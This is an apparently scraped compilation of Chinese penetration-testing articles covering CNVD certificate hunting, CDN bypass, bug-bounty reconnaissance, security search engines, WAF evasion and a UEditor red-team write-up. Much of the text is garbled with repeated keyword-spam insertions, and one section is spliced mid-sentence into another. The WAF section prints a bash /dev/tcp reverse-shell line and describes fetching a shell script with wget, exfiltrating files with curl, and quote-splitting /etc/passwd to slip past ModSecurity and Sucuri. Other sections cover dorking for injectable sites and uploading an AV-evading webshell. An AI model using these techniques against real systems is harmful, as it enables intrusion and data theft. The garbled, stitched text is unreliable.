1.记一次猥琐的搜索搜索渗透
2.小白如何轻松拿下CNVD原创漏洞证书
3.CDN绕过技术总汇
4.cnvd通用型证书获取姿势
5.从零开始的SRC挖掘
6.安全专业人员爱用的11款顶级搜索引擎

记一次猥琐的渗透

       猥琐渗透手法揭秘

       在一次渗透行动中，作者遇到一个仅包含imgaes.php壳和一句话木马的网站网站，尽管面临挑战，源码源码他们依然通过一系列技巧攻破了网站。搜索搜索首先，网站通过弱口令访问phpmyadmin，源码源码自助查询平台源码但发现常用的搜索搜索攻击方法失效。接下来，网站通过burp爆破获取了另一个shell的源码源码密码，然而密码经过复杂加密，搜索搜索对密码学知识要求较高。网站通过Fofa搜索，源码源码作者推测攻击者可能使用批量工具，搜索搜索将shell源码进行了修改，网站以获取关键信息。源码源码

       几天后，作者发现sayhi.txt文件，从而获取了images.php的密码，进而尝试提权。在权限受限的情况下，他们利用已知漏洞，如TeamViewer，绕过防护，成功创建了新账户。这个过程展示了如何利用已知漏洞和第三方工具进行渗透，同时也提醒了读者注意网络安全。

       这篇文章分享的渗透经验主要为了提升网络安全意识，而非鼓励非法行为。读者在实践中需自行承担风险，与合天智汇和原作者无关。请谨慎操作，确保合法合规。

小白如何轻松拿下CNVD原创漏洞证书

       作者：TO凌镜

       0x 前言

       本篇文章主要针对安全圈中小白如何获得CNVD原创漏洞证书进行简单的指导。本人是尚未毕业的实习渗透测试工程师，也是一名网络安全爱好者。

       0x CNVD证书获取条件

       1. 事件型：必须是三大运营商（移动、联通、电信）的中高危漏洞，或者党政机关、重要行业单位、科研院所、重要企事业单位（如：中央国有大型企业、部委直属事业单位等）的高危事件型漏洞。

       2. 通用型：主要介绍通用型漏洞证书获取方式，通用型发证要求为中高危漏洞且漏洞评分不小于4.0。获取通用型证书需满足两个条件：（1）提供漏洞证明案例至少十起，如一个建站平台下的十个网站都存在SQL注入，需在上传的文档中详细复现至少3~5个案例，其余仅需提供URL。（2）漏洞相关公司规模及注册资金要求相应较多，实际操作中不需要太多，只要不是太小的公司即可。

       详细审核及处置流程请访问cnvd.org.cn网站。

       0x 小白如何发现通用型漏洞

       1. 通过建站平台发现漏洞：在日常挖洞过程中，细心观察网站底部技术支持信息，可能找到提供技术支持的厂商，可能是建站平台或其它公司。通过Google搜索厂商，竹子建站源码确认其为建站平台，发现其模板下的网站可能存在SQL注入漏洞，进而获得拿证思路。

       2. 利用搜索引擎发现弱口令：使用Google、Fofa等搜索引擎，了解其语法规则，快速发现漏洞，节省工作量。各大厂商产品出厂时通常存在弱口令，且多数产品不强制修改密码，安全产品或网络设备往往存在弱口令问题。通过Fofa搜索外网映射的设备，利用Google搜索弱口令，发现可用的弱口令登录设备。

       3. 通过白盒审计CMS发现漏洞：需要具备一定的代码审计能力，对小白来说难度较高，但通过努力学习，可以实现。通过发现网站使用的CMS或框架，从GitHub或Google等搜索引擎获取源码进行代码审计，寻找漏洞。

       0x CNVD证书审批流程

       CNVD证书下发流程包含：一级审核、二级审核、漏洞验证、漏洞处置、三级审核、漏洞归档。三级审核是CNVD对提交漏洞进行复现的关键步骤，一般一审和二审会通过，是否获得证书取决于三级审核能否通过。审核周期通常为半个月左右。

       0x 总结

       本篇文章分享了在CNVD挖洞时发现的拿证技巧，对于小白具有一定的帮助。获得CNVD证书在面试和提升技术方面都有一定的价值。网络安全需要不断学习和提升技能，才能在这个行业站稳脚跟。如有问题，欢迎留言指正。

CDN绕过技术总汇

       本文旨在深入探讨CDN绕过技术，以帮助开发者和安全研究人员了解如何找到目标真实IP，从而提升网络资源的访问效率和安全性。

       CDN，即内容分发网络，是一种通过互联网互连的服务器网络系统，旨在将内容快速、可靠地传递给用户，以提供高性能、可扩展性和低成本的网络内容传递服务。CDN利用缓存技术，减少从源站获取数据的延迟，同时分担源站的负载压力，实现负载均衡。

       CDN绕过方法多样，主要包括查询DNS解析记录、检查子域名、利用网络空间引擎、使用SSL证书分析、语音播报源码通过HTTP头查找、网站内容搜索、使用外地主机解析域名等。

       查询DNS解析记录涉及使用Dnsdb、微步在线等工具，查找历史和当前DNS记录，以发现原始IP地址。检查子域名的方法则是通过微步在线、Dnsdb等平台获取子域名及IP，进一步识别真实IP。网络空间引擎如fofa、鹰图、Zoomeye、shodan、等工具则提供更广泛的搜索和分析能力，通过关键词搜索快速定位目标IP。

       SSL证书分析技术利用Censys等工具扫描互联网，查找网站证书，从而揭示真实服务器IP，这一过程涉及搜索证书SHA1指纹、组合参数搜索等步骤。此外，利用HTTP头信息，通过SecurityTrails等平台，可以精准定位原始服务器IP，尤其对于那些使用特定服务器名称和软件名称的网站。

       网站内容搜索技术涉及浏览源代码，查找独特代码片段，如Google Analytics跟踪代码，通过.vd通用型证书获取姿势

       在技术探索中，我运用非技术手段寻找可能存在的漏洞，如通过谷歌引擎搜索寻找大公司的SQL注入漏洞。一种方法是在网站URL后添加引号，检查是否有异常。我注意到在挖掘过程中，曾看到“技术支持：XX建站”的字样。

       在搜索策略上，我利用Fofa搜索谷歌镜像站，如site:.com inurl:php?id= 公司，有时会调整关键词。我还尝试inurl:aspx?id= 学校，site:.com inurl:php?id= 公司，这些都展示了搜索方法的灵活性。

       发现一家公司后，我会在结尾输入引号测试，如遇到技术支持信息，我怀疑这可能预示着某些通用漏洞。通过Fofa直接搜索技术支持后的公司名称，如“技术支持:abc网络”，可以快速定位相关网站。经过筛选，大约去掉一半无关或重复的记录，逐个进行测试。

       虽然有些网站不显示“技术支持”，但查看网页源代码的注释可能发现线索。通过搜索特定的注释，例如明显的sdk实践源码开发者自留信息，同样可以找到相关网站。Ctrl+F搜索也是常用工具，观察导航栏的相似性能帮助判断网站框架是否一致。

       寻找漏洞的过程虽然繁琐，但重点关注注册资金较高的公司，提交漏洞报告时提供多个URL。漏洞复现通常是使用SQLmap，我会分享一个模板来简化这个过程。虽然证书获取不易，但持之以恒，总会有所收获。

从零开始的SRC挖掘

       每一次成功的渗透，都始于广泛、深入的信息搜集。

       信息搜集，范围广泛，包括但不限于公司、子公司、域名、子域名、IPV4、IPV6、小程序、APP、PC软件等。在我专注于EDUsrc的背景下，各大高校亦是重要目标。

       对于某一大学，除了查询备案网站、APP、小程序、微信公众号外，甚至还可以关注微博信息，将这些资源转化为攻击的有利工具。企查查虽需付费，但小蓝本可以替代，一并搜集域名、小程序、微信公众号等信息，这无疑简化了任务。

       获取域名后，采用爆破二级、三级域名，借助OneforALL验证子域名，利用masscan检查端口，或使用子域名收割机，能有效搜集IP信息。IP搜集后，通过定位WHOIS获取用户、邮箱和购买的网段信息，进一步完善了资源库。

       主动信息搜集中，使用如goby等强大资产测绘工具，能发现潜在的web服务和漏洞。被动信息搜集则依赖于在线爬取网站，如Google、百度、购买源码坏处Fofa、Shodan等，通过特定语法检索目标。

       Google搜索中，使用edu网站后缀组合探索；百度语法与之类似，提供不同但相似的查找方式。Fofa语法则通过org或icon_hash定位学校，前者为学校组织，后者是学校图标哈希，搜索时效果显著。Shodan语法也存在类似功能，但会进一步细分组织。

       钟馗之眼工具将组件漏洞列表化，便于检测，而微步在线提供正向和反向查找功能，能发现绑定域名的IP，揭示更多资产。 quake提供了便捷的批量识别和ico识别功能，同时支持历史漏洞查询。

       页面js接口在未授权情况下可能暴露登录、修改密码等敏感操作，Chrome devtools中设置断点进行动态调试和绕过。Kunyu工具集成了zoomeyes、quake等资源，提升了信息搜集效率。

       小程序同样需要信息搜集，企查查找到的小程序中包含服务器接口，通过Crackminapp逆向源代码，寻找主url和合适的参数构造接口，进而发包进行攻击。

       app抓包技巧繁多，我通常使用charles，但仅适用于安卓7以下版本，高版本需自行学习相关技术。信息搜集是一个持续学习的过程，广泛的知识面和深度的挖掘能有效提升攻击广度和深度。

安全专业人员爱用的款顶级搜索引擎

       在数字化世界中，安全专业人员的守护神：款顶级搜索引擎

       随着网络设备与在线服务的爆炸式增长，确保它们的安全变得至关重要。一系列强大的搜索引擎应运而生，为安全专家提供了无尽的洞察，帮助他们对抗在线威胁，保护数据和网络。以下是专为安全研究者打造的款搜索引擎，它们像灯塔一样照亮了网络安全的迷雾。

       1. ONYPHE - 网络防御的超级大脑

       ONYPHE，如同一个无所不知的搜索巨人，广泛扫描互联网，汇聚开源和威胁情报数据，为安全人员提供详尽的网络防御全景。通过主动扫描和与网站url信息的交叉比对，ONYPHE的API和查询语言为研究者提供了易于访问的详实数据，助他们追踪受损设备。

       2. Shodan - 联网设备的索引者

       Shodan像是一部设备地图，允许用户通过设备名称、位置等分类搜索互联网上的设备，从恒温器到工业级SCADA系统。它实时监控设备状态，为渗透测试和漏洞管理提供有力支持。

       3. Censys - 精确的联网设备数据仓库

       Censys的搜索能力超越了Shodan，它不仅揭示设备类型，还详尽列出操作系统、IP地址和开放端口等，为实时监控和设备保护提供了宝贵信息。它的精确数据源包括TLS/SSL协议和网络漏洞，助力防御体系建设。

       4. PublicWWW - 搜索恶意软件的隐秘之地

       PublicWWW是营销研究者的得力助手，它通过搜索活动库，帮助安全人员追踪恶意网站。源代码搜索功能让研究人员能够深入探究网站内容，查找可疑痕迹。

       5. GreyNoise - 噪声与防御的桥梁

       GreyNoise以机器学习为驱动，解析网络活动，区分扫描源，帮助安全专家识别潜在威胁。通过输入IP或关键词，研究人员可以获取实时的网络活动图景。

       6. Hunter - 验证电子邮件的专业助手

       Hunter简化了电子邮件验证过程，无论是寻找个人联系信息还是公司邮件列表，它都提供了详尽且准确的数据，有助于建立更坚实的联系网络。

       7. BinaryEdge - 实时威胁情报的生成器

       BinaryEdge以机器学习为后盾，实时监测网络数据，生成威胁报告。其涵盖的范围广泛，从开放端口到漏洞检测，为安全团队提供了实时的情报支持。

       8. Have I Been Pwned - 数据泄露的防护盾

       Troy Hunt的创建之作，Have I Been Pwned让人们可以免费检查自己的数据是否曾被泄露。这个开源工具是保护个人信息安全的重要工具，数据库庞大，信息详实。

       9. Fofa - 全球网络空间的绘制者

       由华顺信安打造的FOFA，汇聚全球网络资产，成为评估和保护公开资产的重要工具。它积累了庞大的资产数据库，精准识别各种网络设备和资产。

       . ZoomEye - 网络空间的侦察兵

       ZoomEye，来自知道创宇，提供了免费的OSINT工具，搜索和监控在线设备，通过指纹分析揭示开放端口和漏洞，助力网络维护。

       . WiGLE - Wi-Fi热点的全球地图

       WiGLE的使命是绘制全球Wi-Fi热点，超过亿的网络热点数据供安全人员追踪和预防不安全网络带来的风险。

       这些搜索引擎作为网络安全的专业伙伴，帮助安全人员在信息海洋中定位潜在威胁，为保护我们的数字世界奠定了坚实的基础。

WAF绕过技术系列文章（二）

       在前面的文章中，我们学习了如何通过通配符绕过WAF规则，特别是使用问号通配符。但是，绕过WAF的方法远不止于此。对于不同的攻击，WAF规则绕过方法各不相同。例如，在SQL注入中，你可以利用注释语法来绕过WAF，而不仅仅是简单的加号。

       当目标网站的WAF防御级别较低时，星号和连字符能帮你成功绕过WAF。但这只适用于SQL注入，不能用于本地文件包含和远程命令执行。对于某些特殊场景，WAF很难真正防御住针对目标网站的远程命令执行，因为这种攻击使用了字符串连接符。

       如果你想实际操作这些绕过方法，可以在我创造的FluxCapacitor手动练习，这是一个在hackthebox上的漏洞演示虚拟机。

       在许多编程语言中，字符串连接通常通过二进制符号实现。例如，加号，"Hello, " + "World"得到值为"Hello, World"。在其他编程语言中，连接符可能是不同符号，特别是涉及到隐式的类型转换，并不会使用加号等符号。例如在Perl和PHP中连接符为.,在Lua等语言中，连接符为..

       但是你可别认为这是连接两个字符串的唯一方式。

       当你在Bash使用C，C++，Python等编程语言时，你可以利用一种基于Bash的字符串连接特性，即：两个相邻的字符串即使中间没有任何符号，它们也可被当作连接在一起,"Hello," "World"等同于"Hello, World"。这个特性不仅适用于printf和echo等命令，还可适用于整体Bash语法。让我们从简单的例子开始。

       下面的所有命令运行结果相同：

       从上我们可以清楚了解到Bash中的字符串连接特性。实际上，'te's't'是由三个字符串组成：字符串te、字符串s和字符串t。这种语法可以有效地绕过基于“字符串匹配”的WAF规则。

       ModSecurity中的防御规则SecRule ARGS "@pm passwd shadow groups"…将拦截所有包含字符串passwd或字符串shadow的请求。但是，如果我们把它们转换成pa'ss'wd或sh'ad'ow呢？就像我上面所提到的那样。而且，你不仅可以使用连接字符串来代替文件参数，还可以用来代替执行路径！

       下面的所有命令运行结果也相同：

       现在，我们已经发现一个远程命令执行的绕过WAF方法。如果你面临的WAF存在基于敏感字符串的拦截，你就可以用它绕过WAF规则：

       下面我会用PHP代码做些测试，像往常一样，目标WAF是sucuri WAF和ModSecurity。如下是我们的网页代码，当然，它显得太过简单，功能主要是利用curl和system()形成一个命令执行场景。虽然它看起来很不靠谱，但奇怪的是，你可以在多个实际应用场景发现这种愚蠢的代码。

       我想我在发布这些文章后，Sucuri会立马把我拉黑。但是，我发誓：我使用Sucuri waf与ModSecurity进行比较，不是因为我要说明哪个更好。因为Sucuri被广泛使用，如果有用户阅读了本文，就可以在他们的自己的Web应用上更好地进行安全测试。

       首先，我尝试发出请求获取 google.com，而使用最原始地请求：

       如预期的一样，返回了 google.com的页面，基于地理位置，让我跳转到 www.google.de：

       现在，为了做坏事，我使用分号破坏curl语法，尝试执行其他系统命令。但是当我试图读取/etc/passwd文件时，Sucuri就会拦截请求，请求如下：

       被Sucuri拦截的原因如下：“检测到一个RFI/LFI攻击”。我认为（只是一个假设）Sucuri的这个拦截使用了类似于我们上面所提及的“字符串匹配”技术，它可能会拦截所有常见的路径和文件名，如/etc/passwd。当我把这个WAF的拦截力度调到最低时，我就可以利用两个单引号来绕过！

       我知道你现在在想什么：“就算你可以读取passwd文件又怎样……你可以绕过Sucuri WAF得到一个shell吗？”这个问题的答案当然是，YES！唯一的问题就是我们不能使用netcat，因为它还没有安装。

       返回一个shell的最简单方法是使用bash -i命令：bash -i >& /dev/tcp/1.1.1.1/ 0>&1，但不幸的是，它太复杂了，很难彻底绕过WAF，这同时也意味着很难使用一些php、perl或python代码来获得shell。Sucuri WAF频繁拦截了我的请求，原因是：检测到模糊攻击。

       接下来，我尝试使用curl或wget命令将python的反弹shell脚本上传上去，以获得shell。shell.py代码如下：

       然后，我们在本机使用python -c SimpleHTTPServer或php -s等搭建Web服务，方便目标服务器从中下载python文件，下载shell.py文件用以下语法：

       好的，Sucuri Waf没有拦截这个请求，但是ModSecurity通常会拦截这类请求，为了要绕过这类WAF规则，可以使用wget+ip转换+字符串连接来达成：

       第一个命令使用wget下载shell文件到/tmp/。第二个命令使用chmod修改其可执行权限，第三个命令是执行它。如您所见，wget命令发出的请求中没有指明文件名，因此被下载的文件被命名为index.html。你可以使用netcat 命令nc手动写入HTTP的响应头和内容主体来决定文件内容，如下所示：

       接下来，我们要绕过更难的WAF

       你可能认为我们可以用上面的技术绕过OWASP核心规则集的低级规。但是，这是不可能的。因为有两个小东西叫做normalizePath和cmdLine。在ModSecurity中，它们被称为“转换函数”，用于将用户输入的原始数据先转换，然后再匹配。如果WAF认为数据无害，才会发送原始数据到Web服务器。

       normalizePath：它会删除字符串中的多个斜杠、目录的自引用和目录的上级引用（除了最开始的输入）。

       cmdLine：由Marc Stern开发，会将所有的输入规范化，例如/e't'c/pa'ss'wd会被转换规范为/etc/passwd。总之它可以做很多事：

       因为cmdLine，WAF规则就可以拦截所有利用字符串连接来进行远程命令执行的尝试，拦截信息如下：

       现在我不能读取/etc/passwd，但不要绝望！OWASP核心规则集会拦截常用的文件路径和命令，但它不能对目标应用的源代码执行拦截。我虽然不能使用分号（这意味着我不能跳出curl语法），但我可以使用curl来提取文件并将其发送到远程服务器。以上方法可绕过0到3级别的防御。

       主要方法是利用POST的HTTP请求将文件发送到远程服务器，命令如下：

       在此基础上，我们把@编码为%：

       如果防御等级为4，以上这些都不起作用，因为payload中的连字符、正斜杠等字符会引起拦截。但好消息是，防御级别4在生产环境中很少见。

       上面所述的绕过技术同样也可以应用于反斜杠字符。反斜杠不是用来串联字符串，而是用来转义：

       以上就是全部内容。谢谢！

       来源： WAF绕过技术系列文章（二）|NOSEC安全讯息平台 - NOSEC.ORG

       白帽汇从事信息安全，专注于安全大数据、企业威胁情报。

       公司产品：FOFA-网络空间安全搜索引擎、FOEYE-网络空间检索系统、NOSEC-安全讯息平台。

       为您提供：网络空间测绘、企业资产收集、企业威胁情报、应急响应服务。

记某次攻防演练：大战UEditor并突破

       参与某次攻防演练，目标单位存在公开的域名备案信息。通过FOFA搜索，发现该单位存在端口的开放子域名，启动渗透流程。目录扫描后，发现/bin.rar路径可以访问到一个压缩文件，下载解压缩后，初步判断为.NET形式的站点源代码，使用C#语言编写。进一步分析dll文件的命名规则和.NET格式，判断出主要的后端逻辑代码位于xxx.Application.Web.dll文件中。为了解读二进制dll文件，使用dnspy进行反编译。为帮助网安学习者，提供一套免费资料包，包括网安学习路径思维导图、工具包、SRC分析报告、攻防实战技术电子书、CISSP认证资料、CTF实战技巧、大厂面试题集、客户端安全检测指南等。

       源码中发现使用UEditor。UEditor的路径为/Utility/UEditor/controller.ashx。尝试访问关键接口，发现返回错误，可能由于WAF或EDR拦截。通过Fuzz方法，发现通过访问/Utility/UEditor/.css?action=catchimage可以绕过拦截，成功访问关键接口。利用UEditor .net版本的任意文件上传漏洞，上传哥斯拉jsp webshell。漏洞利用参考链接：freebuf.com/vuls/...。在上传过程中遇到杀软拦截，使用github.com/Tas9er/ByPas...项目对webshell进行免杀处理，最终成功上传并连接，完成UEditor站点的利用。接下来，通过愉快地打内网进行后续操作。

       传统的UEditor利用方式通常需要本地编写HTML文件，包含表单以提交马地址至目标服务器。不过，原理基于HTTP请求发送马地址，因此可以直接在Burp Suite中发送请求达到相同效果，省去制作HTML文件的步骤。请求发送后，服务器返回webshell路径。总结，攻防演练过程中，通过信息收集、渗透测试、代码分析、利用漏洞等步骤，成功完成目标系统的利用，展示了攻防技术的实战应用。